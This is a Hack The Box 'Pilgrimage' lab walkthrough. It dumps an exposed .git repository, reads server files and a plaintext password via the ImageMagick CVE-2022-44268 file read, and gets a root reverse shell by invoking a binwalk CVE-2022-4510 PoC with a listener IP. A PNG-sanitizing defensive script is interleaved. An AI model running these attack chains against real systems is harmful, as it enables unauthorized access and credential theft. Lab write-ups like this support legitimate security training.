#hackthebox #easy #linux #git #git-dumper

![[Pasted image 20250802014010.png]]

# Information Gathering - Nmap

First, as usual, I performed a TCP scan against all ports and discovered 2 open ports.

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ nmap $IP -Pn -n --open --min-rate 3000 -p- -oN tcpAll
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-02 01:33 UTC
Nmap scan report for 10.10.11.219
Host is up (0.052s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 16.99 seconds
```

Then another TCP scan against the 2 open ports, 22 and 80, to gather more information.

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ nmap $IP -sCV -p 22,80
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-02 01:34 UTC
Nmap scan report for 10.10.11.219
Host is up (0.045s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey: 
|   3072 20:be:60:d2:95:f6:28:c1:b7:e9:e8:17:06:f1:68:f3 (RSA)
|   256 0e:b6:a6:a8:c9:9b:41:73:74:6e:70:18:0d:5f:e0:af (ECDSA)
|_  256 d1:4e:29:3c:70:86:69:b4:d7:2c:c8:0b:48:6e:98:04 (ED25519)
80/tcp open  http    nginx 1.18.0
|_http-title: Did not follow redirect to http://pilgrimage.htb/
|_http-server-header: nginx/1.18.0
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.45 seconds
```

Lastly, a UDP scan against the top 10 ports.

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ nmap $IP -sU --top-ports 10
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-02 01:36 UTC
Nmap scan report for 10.10.11.219
Host is up (0.046s latency).
PORT     STATE         SERVICE
53/udp   closed        domain
67/udp   closed        dhcps
123/udp  open|filtered ntp
135/udp  closed        msrpc
137/udp  closed        netbios-ns
138/udp  closed        netbios-dgm
161/udp  closed        snmp
445/udp  closed        microsoft-ds
631/udp  open|filtered ipp
1434/udp closed        ms-sql-m

Nmap done: 1 IP address (1 host up) scanned in 5.12 seconds
```

---

# Enumeration

##### HTTP - TCP 80

The landing page was originally empty, so I added `pilgrimage.htb` to the `/etc/hosts` file. This is what the landing page looks like: it's a website for an image shrinker.

![[Pasted image 20250801204903.png]]

On the `login` page, I tried some default credentials, but they did not work, so I made an account under my name. I wanted to try the shrink feature and see what happens, so I uploaded a random image and pressed the `shrink` button.

![[Pasted image 20250801205334.png]]

Then on the `Dashboard` page there were the URLs for the shrunken images I had uploaded (I tried twice). Notice that the names of the image files I uploaded have been changed to random strings.

![[Pasted image 20250801205756.png]]

Not only that, Burp also shows that even if I change the file name to `.php`, the backend changes the file extension back to `.png`, which indicates that getting a webshell is going to be very difficult.

![[Pasted image 20250801222401.png]]

After adding `pilgrimage.htb` to `/etc/hosts`, I ran `nmap` again, and this time it revealed that a `.git` directory is present on the server.

```bash
80/tcp open  http    nginx 1.18.0
|_http-title: Pilgrimage - Shrink Your Images
|_http-server-header: nginx/1.18.0
| http-git: 
|   10.10.11.219:80/.git/
|     Git repository found!
|     Repository description: Unnamed repository; edit this file 'description' to name the...
|_    Last commit message: Pilgrimage image shrinking service initial commit. # Please ...
```

I used `git-dumper` to dump the `.git` directory:

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ git-dumper http://pilgrimage.htb/.git/ git_loot/
[-] Testing http://pilgrimage.htb/.git/HEAD [200]
[-] Testing http://pilgrimage.htb/.git/ [403]
[-] Fetching common files
... <SNIP>
```

The dump contained the following. What stood out to me was the `magick` binary; I think that's what is responsible for converting the uploaded files and changing their names and extensions.

```bash
┌──(kali㉿kali)-[~/Desktop/git_loot]
└─$ ls
assets  dashboard.php  index.php  login.php  logout.php  magick  register.php  vendor

┌──(kali㉿kali)-[~/Desktop/git_loot]
└─$ file *
assets:        directory
dashboard.php: PHP script, Unicode text, UTF-8 text, with CRLF line terminators
index.php:     PHP script, Unicode text, UTF-8 text, with CRLF line terminators
login.php:     PHP script, Unicode text, UTF-8 text, with CRLF line terminators
logout.php:    PHP script, ASCII text, with CRLF line terminators
magick:        ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=9fdbc145689e0fb79cb7291203431012ae8e1911, stripped
register.php:  PHP script, Unicode text, UTF-8 text, with CRLF line terminators
vendor:        directory
```

`git log` didn't reveal much beyond a single commit, but we at least found a username: `emily`.

```bash
┌──(kali㉿kali)-[~/Desktop/git_loot]
└─$ git log
commit e1a40beebc7035212efdcb15476f9c994e3634a7 (HEAD -> master)
Author: emily <[email protected]>
Date:   Wed Jun 7 20:11:48 2023 +1000

    Pilgrimage image shrinking service initial commit.
```

`./magick --version` revealed the version of the binary.
Let's look it up and see if it has any known vulnerabilities.

```bash
┌──(kali㉿kali)-[~/Desktop/git_loot]
└─$ ./magick --version
Version: ImageMagick 7.1.0-49 beta Q16-HDRI x86_64 c243c9281:20220911 https://imagemagick.org
Copyright: (C) 1999 ImageMagick Studio LLC
License: https://imagemagick.org/script/license.php
Features: Cipher DPC HDRI OpenMP(4.5) 
Delegates (built-in): bzlib djvu fontconfig freetype jbig jng jpeg lcms lqr lzma openexr png raqm tiff webp x xml zlib
Compiler: gcc (7.5)
```

There is indeed a known vulnerability for this version: an arbitrary file read, CVE-2022-44268.

![[Pasted image 20250801224041.png]]

The PoC of the exploit can be found [here](https://git.rotfl.io/v/CVE-2022-44268). The author wrote a very detailed step-by-step guide on how to use it.

First, I cloned the repo:

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ git clone https://git.rotfl.io/v/CVE-2022-44268.git
Cloning into 'CVE-2022-44268'...
remote: Enumerating objects: 30, done.
remote: Counting objects: 100% (30/30), done.
remote: Compressing objects: 100% (19/19), done.
remote: Total 30 (delta 8), reused 30 (delta 8), pack-reused 0
Receiving objects: 100% (30/30), 954.74 KiB | 1.22 MiB/s, done.
Resolving deltas: 100% (8/8), done.
```

Then run `cargo run "/etc/passwd"`:

```bash
┌──(kali㉿kali)-[~/Desktop/CVE-2022-44268]
└─$ ls
Cargo.lock  Cargo.toml  image.png  README.md  screens  src

┌──(kali㉿kali)-[~/Desktop/CVE-2022-44268]
└─$ cargo run "/etc/passwd"
    Updating crates.io index
  Downloaded bitflags v1.3.2
  Downloaded cfg-if v1.0.0
  Downloaded adler v1.0.2
  Downloaded hex v0.4.3
  Downloaded crc32fast v1.3.2
  Downloaded png v0.17.7
  Downloaded flate2 v1.0.25
  Downloaded miniz_oxide v0.6.2
  Downloaded 8 crates (301.4 KB) in 0.23s
   Compiling crc32fast v1.3.2
   Compiling cfg-if v1.0.0
   Compiling adler v1.0.2
   Compiling bitflags v1.3.2
   Compiling hex v0.4.3
   Compiling miniz_oxide v0.6.2
   Compiling flate2 v1.0.25
   Compiling png v0.17.7
   Compiling cve-2022-44268 v0.1.0 (/home/kali/Desktop/CVE-2022-44268)
    Finished `dev` profile [unoptimized + debuginfo] target(s) in 4.84s
     Running `target/debug/cve-2022-44268 /etc/passwd`
```

Next, `magick image.png -resize 50% output.png` followed by `identify -verbose output.png`:

```bash
┌──(kali㉿kali)-[~/Desktop/git_loot]
└─$ ./magick image.png -resize 50% output.png
magick: keyword "Raw profile type ": bad character '0x20' `output.png' @ warning/png.c/MagickPNGWarningHandler/1750.

┌──(kali㉿kali)-[~/Desktop/git_loot]
└─$ ls
assets  dashboard.php  image.png  index.php  login.php  logout.php  magick  output.png  register.php  vendor

┌──(kali㉿kali)-[~/Desktop/git_loot]
└─$ identify -verbose output.png
Image:
  Filename: output.png
  Permissions: rw-rw-r--
  Format: PNG (Portable Network Graphics)
  Mime type: image/png
  ... <SNIP>
```

Scrolling down to the bottom, you will find the hex.

![[Pasted image 20250801225236.png]]

If we convert the hex back to binary, we get the actual `/etc/passwd` contents. This file read is done as the `www-data` user, so we will not be able to read emily's `.ssh` directory.
```bash
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:109::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:104:110:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
emily:x:1000:1000:emily,,,:/home/emily:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
_laurel:x:998:998::/var/log/laurel:/bin/false
```

Then I went back to the git repo we dumped earlier and found the path of the `sqlite` database. I'm going to repeat the steps one more time to read `/var/db/pilgrimage` and see what it contains.
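A defender's aside on what makes this read possible: the PoC plants the requested path in a PNG text chunk whose keyword is `profile` (the `Profile : /var/db/pilgrimage` line that exiftool prints in this writeup is that chunk), and this ImageMagick build reads the named file and copies it into the output image. The following Python is an added example, not code from the writeup or from the PoC repository: it walks a PNG's chunks, verifies each CRC, drops every `tEXt`/`zTXt`/`iTXt` chunk before the file would reach the converter, and returns the keywords it removed, so the same routine can also flag files already sitting in an upload directory. The 1x1 sample PNG is constructed inline.

```python
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"
# Ancillary chunk types that carry keyword/value metadata; ImageMagick 7.1.0-49
# treats a "profile" keyword in these as a file to read (CVE-2022-44268).
TEXT_CHUNKS = {b"tEXt", b"zTXt", b"iTXt"}


def make_chunk(ctype: bytes, body: bytes) -> bytes:
    """Serialize one PNG chunk: length, type, body, CRC32 over type+body."""
    return struct.pack(">I4s", len(body), ctype) + body + struct.pack(">I", zlib.crc32(ctype + body))


def iter_chunks(data: bytes):
    """Yield (type, body) for each chunk, checking the signature and every CRC."""
    if data[:8] != PNG_SIG:
        raise ValueError("not a PNG file")
    pos = 8
    while pos + 12 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        body = data[pos + 8:pos + 8 + length]
        (crc,) = struct.unpack(">I", data[pos + 8 + length:pos + 12 + length])
        if zlib.crc32(ctype + body) != crc:
            raise ValueError(f"bad CRC in {ctype.decode('latin-1')} chunk")
        yield ctype, body
        pos += 12 + length
        if ctype == b"IEND":
            break


def sanitize_png(data: bytes):
    """Return (clean_png, removed_keywords): every text chunk dropped, the rest re-emitted."""
    removed, out = [], [PNG_SIG]
    for ctype, body in iter_chunks(data):
        if ctype in TEXT_CHUNKS:
            # All three text chunk kinds start with a NUL-terminated keyword (1-79 bytes)
            removed.append(body.split(b"\x00", 1)[0].decode("latin-1", "replace"))
            continue
        out.append(make_chunk(ctype, body))
    return b"".join(out), removed


# Constructed sample (not from the writeup): a 1x1 grayscale PNG carrying the same
# kind of "profile" text chunk that exiftool reported as "Profile : /var/db/pilgrimage".
SAMPLE_PNG = PNG_SIG + make_chunk(b"IHDR", struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)) \
    + make_chunk(b"tEXt", b"profile\x00/var/db/pilgrimage") \
    + make_chunk(b"IDAT", zlib.compress(b"\x00\x00")) + make_chunk(b"IEND", b"")

if __name__ == "__main__":
    clean, flagged = sanitize_png(SAMPLE_PNG)
    print("removed text chunks with keywords:", flagged)  # ['profile']
```

Pointing `sanitize_png` at a stored file and only reading the returned keyword list turns it into a detection pass over an existing `shrunk/` directory without rewriting anything.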
![[Pasted image 20250801232633.png]]

```bash
┌──(kali㉿kali)-[~/Desktop/CVE-2022-44268]
└─$ cargo run "/var/db/pilgrimage"
    Finished `dev` profile [unoptimized + debuginfo] target(s) in 0.01s
     Running `target/debug/cve-2022-44268 /var/db/pilgrimage`

┌──(kali㉿kali)-[~/Desktop/CVE-2022-44268]
└─$ exiftool image.png
ExifTool Version Number         : 13.25
File Name                       : image.png
Directory                       : .
File Size                       : 1660 bytes
File Modification Date/Time     : 2025:08:02 04:27:37+00:00
File Access Date/Time           : 2025:08:02 04:24:34+00:00
File Inode Change Date/Time     : 2025:08:02 04:27:37+00:00
File Permissions                : -rw-rw-r--
File Type                       : PNG
File Type Extension             : png
MIME Type                       : image/png
Image Width                     : 200
Image Height                    : 200
Bit Depth                       : 8
Color Type                      : RGB with Alpha
Compression                     : Deflate/Inflate
Filter                          : Adaptive
Interlace                       : Noninterlaced
Profile                         : /var/db/pilgrimage
Image Size                      : 200x200
Megapixels                      : 0.040
```

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ head sqlite.hex
53514c69746520666f726d617420330010000101004020200000004c0000000500000000
000000000000000400000004000000000000000000000001000000000000000000000000
00000000000000000000000000000000000000000000004c002e4b910d0ff800040eba00
0f650fcd0eba0f3800000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000

┌──(kali㉿kali)-[~/Desktop]
└─$ cat sqlite.hex | xxd -r -p > sqlite.db
```

After repeating the steps for `/var/db/pilgrimage`, I found emily's credentials inside.

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ sqlite3 sqlite.db
SQLite version 3.46.1 2024-08-13 09:16:08
Enter ".help" for usage hints.
sqlite> .dump
PRAGMA foreign_keys=OFF;
BEGIN TRANSACTION;
CREATE TABLE users (username TEXT PRIMARY KEY NOT NULL, password TEXT NOT NULL);
INSERT INTO users VALUES('emily','abigchonkyboi123');
CREATE TABLE images (url TEXT PRIMARY KEY NOT NULL, original TEXT NOT NULL, username TEXT NOT NULL);
COMMIT;
sqlite> 
```

# Initial Access - shell as `emily`

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ ssh emily@$IP
[email protected]'s password: 
Linux pilgrimage 5.10.0-23-amd64 #1 SMP Debian 5.10.179-1 (2023-05-12) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
emily@pilgrimage:~$ whoami
emily
```

Found `user.txt`:

```bash
emily@pilgrimage:~$ cat user.txt
fe1...
```

# Privilege Escalation

`ps faux | grep root` revealed this unusual process. Let's look at what this file does.

![[Pasted image 20250802010423.png]]

`inotifywait` is monitoring the path `/var/www/pilgrimage.htb/shrunk` for any file creation event. When a file is uploaded there, `binwalk -e` analyzes (and extracts) the contents of the file as root, and the file is removed if binwalk's output matches one of the blacklisted strings.

```bash
emily@pilgrimage:/home$ cat /usr/sbin/malwarescan.sh
#!/bin/bash

blacklist=("Executable script" "Microsoft executable")

/usr/bin/inotifywait -m -e create /var/www/pilgrimage.htb/shrunk/ |
	while read FILE; do
		filename="/var/www/pilgrimage.htb/shrunk/$(/usr/bin/echo "$FILE" | /usr/bin/tail -n 1 | /usr/bin/sed -n -e 's/^.*CREATE //p')"
		binout="$(/usr/local/bin/binwalk -e "$filename")"
		for banned in "${blacklist[@]}"; do
			if [[ "$binout" == *"$banned"* ]]; then
				/usr/bin/rm "$filename"
				break
			fi
		done
	done
```

The version of `binwalk` is 2.3.2.

```bash
emily@pilgrimage:/home$ binwalk

Binwalk v2.3.2
Craig Heffner, ReFirmLabs
https://github.com/ReFirmLabs/binwalk

Usage: binwalk [OPTIONS] [FILE1] [FILE2] [FILE3] ...

Signature Scan Options:
    -B, --signature              Scan target file(s) for common file signatures
    -R, --raw=<str>              Scan target file(s) for the specified sequence of bytes
    -A, --opcodes                Scan target file(s) for common executable opcode signatures
    -m, --magic=<file>           Specify a custom magic file to use
    -b, --dumb                   Disable smart signature keywords
    -I, --invalid                Show results marked as invalid
    -x, --exclude=<str>          Exclude results that match <str>
    -y, --include=<str>          Only show results that match <str>
```

Apparently, there is a known vulnerability for this version of Binwalk.

![[Pasted image 20250802011340.png]]

The PoC explains that it needs 3 arguments: a `.png` file, the IP of the listener, and the listener port.

![[Pasted image 20250802011642.png]]

I transferred the PoC to `/dev/shm` on the target host and created an empty `.png` file. When it ran successfully, I was told to rename the output to `binwalk_exploit`.

```bash
emily@pilgrimage:/dev/shm$ python3 51249.py exploit.png 10.10.14.14 1234

################################################
------------------CVE-2022-4510----------------
################################################
--------Binwalk Remote Command Execution--------
------Binwalk 2.1.2b through 2.3.2 included-----
------------------------------------------------
################################################
----------Exploit by: Etienne Lacoche-----------
---------Contact Twitter: @electr0sm0g----------
------------------Discovered by:----------------
---------Q. Kaiser, ONEKEY Research Lab---------
---------Exploit tested on debian 11------------
################################################

You can now rename and share binwalk_exploit and start your local netcat listener.
```

Since `inotifywait` in `malwarescan.sh` is monitoring the specific path `/var/www/pilgrimage.htb/shrunk` for file creation, we have to move our file to that same path to trigger the exploit.
I copied `binwalk_exploit.png` to `/var/www/pilgrimage.htb/shrunk` and got a reverse shell as `root`!

![[Pasted image 20250802012649.png]]

Found `root.txt`:

```bash
cat root.txt
621...
```